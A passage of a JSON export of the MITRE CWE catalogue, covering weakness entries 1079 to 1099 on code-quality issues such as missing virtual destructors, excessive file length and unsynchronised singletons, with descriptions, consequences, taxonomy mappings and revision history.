Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1079":{"attr":{"@_ID":"1079","@_Name":"Parent Class without Virtual Destructor Method","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A parent class contains one or more child classes, but the parent class does not have a virtual destructor method.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably due to undefined or unexpected behaviors.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-16"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-16"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1080":{"attr":{"@_ID":"1080","@_Name":"Source Code File with Excessive Number of Lines of Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A source code file has too many lines of\\n\\t\\t\\t\\t\\tcode.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"too many lines of code\\" may vary for each product or developer, CISQ recommends a default threshold value of 1000."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-8"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-8"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1082":{"attr":{"@_ID":"1082","@_Name":"Class Instance Self Destruction Control Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a class instance that calls the method or function to delete or destroy itself.","Extended_Description":{"xhtml:p":["For example, in C++, \\"delete this\\" will cause the object to delete itself.","This issue can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-7"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-7"}},{"attr":{"@_External_Reference_ID":"REF-976"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1083":{"attr":{"@_ID":"1083","@_Name":"Data Access from Outside Expected Data Manager Component","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software is intended to manage data access through a particular data manager component such as a relational or non-SQL database, but it contains code that performs data access operations without using that component.","Extended_Description":{"xhtml:p":["When the software has a data access component, the design may be intended to handle all data access operations through that component.  If a data access operation is performed outside of that component, then this may indicate a violation of the intended design.","This issue can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-10"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-10"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1084":{"attr":{"@_ID":"1084","@_Name":"Invokable Control Element with Excessive File or Data Access Operations","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A function or method contains too many\\n\\t\\t\\t\\t\\toperations that utilize a data manager or file resource.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"too many operations\\" may vary for each product or developer, CISQ recommends a default maximum of 7 operations for the same data manager or file."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-14"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-14"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1085":{"attr":{"@_ID":"1085","@_Name":"Invokable Control Element with Excessive Volume of Commented-out Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A function, method, procedure, etc. contains an excessive amount of code that has been\\n\\t\\t\\t\\t\\tcommented out within its body.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"excessive volume\\" may vary for each product or developer, CISQ recommends a default threshold of 2% of commented code."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-6"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-6"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1086":{"attr":{"@_ID":"1086","@_Name":"Class with Excessive Number of Child Classes","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A class contains an unnecessarily large number of\\n\\t\\t\\t\\t\\tchildren.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"large number of children\\" may vary for each product or developer, CISQ recommends a default maximum of 10 child classes."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1093","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-18"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-18"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1087":{"attr":{"@_ID":"1087","@_Name":"Class with Virtual Method without a Virtual Destructor","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A class contains a virtual method, but the method does not have an associated virtual destructor.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably, e.g. due to undefined behavior.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-15"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-15"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1088":{"attr":{"@_ID":"1088","@_Name":"Synchronous Access of Remote Resource without Timeout","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code has a synchronous call to a remote resource, but there is no timeout for the call, or the timeout is set to infinite.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably, since an outage for the remote resource can cause the software to hang.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"821","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-19"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-19"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1089":{"attr":{"@_ID":"1089","@_Name":"Large Data Table with Excessive Number of Indices","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a large data table that contains an excessively large number of\\n\\t\\t\\t\\t\\tindices.","Extended_Description":{"xhtml:p":["This issue can make the software perform more slowly.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability.","While the interpretation of \\"large data table\\" and \\"excessively large number of indices\\" may vary for each product or developer, CISQ recommends a default threshold of 1000000 rows for a \\"large\\" table and a default threshold of 3 indices."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-6"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-6"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1090":{"attr":{"@_ID":"1090","@_Name":"Method Containing Access of a Member Element from Another Class","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A method for a class performs an operation that directly\\n\\t\\t\\t\\t\\taccesses a member element from another class.","Extended_Description":{"xhtml:p":"This issue suggests poor encapsulation and makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-16"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-16"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1091":{"attr":{"@_ID":"1091","@_Name":"Use of Object without Invoking Destructor Method","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a method that accesses an object but does not later invoke\\n\\t\\t\\t\\t\\tthe element\'s associated finalize/destructor method.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly by retaining memory and/or other resources longer than necessary.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"772","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-15"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-15"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1092":{"attr":{"@_ID":"1092","@_Name":"Use of Same Invokable Control Element in Multiple Architectural Layers","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses the same control element across multiple\\n\\t\\t\\t\\t\\tarchitectural layers.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-10"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-10"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1093":{"attr":{"@_ID":"1093","@_Name":"Excessively Complex Data Representation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses an unnecessarily complex internal representation for its data structures or interrelationships between those structures.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Reduce Maintainability"},{"Scope":"Other","Impact":"Reduce Performance"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1094":{"attr":{"@_ID":"1094","@_Name":"Excessive Index Range Scan for a Data Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains an index range scan for a large data table,\\n\\t\\t\\t\\t\\tbut the scan can cover a large number of rows.","Extended_Description":{"xhtml:p":["This issue can make the software perform more slowly.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability.","While the interpretation of \\"large data table\\" and \\"excessive index range\\" may vary for each product or developer, CISQ recommends a threshold of 1000000 table rows and a threshold of 10 for the index range."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-7"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-7"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1095":{"attr":{"@_ID":"1095","@_Name":"Loop Condition Value Update within the Loop","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a loop with a control flow condition based on\\n\\t\\t\\t\\t\\ta value that is updated within the body of the loop.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-5"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-5"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1096":{"attr":{"@_ID":"1096","@_Name":"Singleton Class Instance Creation without Proper Locking or Synchronization","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software implements a Singleton design pattern but does not use appropriate locking or other synchronization mechanism to ensure that the singleton class is only instantiated once.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably, e.g. by making the instantiation process non-thread-safe and introducing deadlock (CWE-833) or livelock conditions.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"820","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-12"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-12"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"1097":{"attr":{"@_ID":"1097","@_Name":"Persistent Storable Data Element without Associated Comparison Control Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a storable data element that does not have\\n\\t\\t\\t\\t\\tall of the associated functions or methods that are necessary to support\\n\\t\\t\\t\\t\\tcomparison.","Extended_Description":{"xhtml:p":["For example, with Java, a class that is made persistent requires both hashCode() and equals() methods to be defined.","This issue can prevent the software from running reliably, due to incorrect or unexpected comparison results.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"595","@_View_ID":"1305","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-4"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-4"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1098":{"attr":{"@_ID":"1098","@_Name":"Data Element containing Pointer Item without Proper Copy Control Element","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a data element with a pointer that does not have an associated copy or constructor method.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-6"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-6"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1099":{"attr":{"@_ID":"1099","@_Name":"Inconsistent Naming Conventions for Identifiers","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s code, documentation, or other artifacts do not\\n\\t\\t\\t\\t\\tconsistently use the same naming conventions for variables, callables, groups of\\n\\t\\t\\t\\t\\trelated callables, I/O capabilities, data types, file names, or similar types of\\n\\t\\t\\t\\t\\telements.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand 